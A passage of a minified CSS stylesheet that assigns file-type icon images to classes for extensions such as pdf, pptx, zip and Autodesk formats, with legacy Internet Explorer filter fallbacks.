\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none 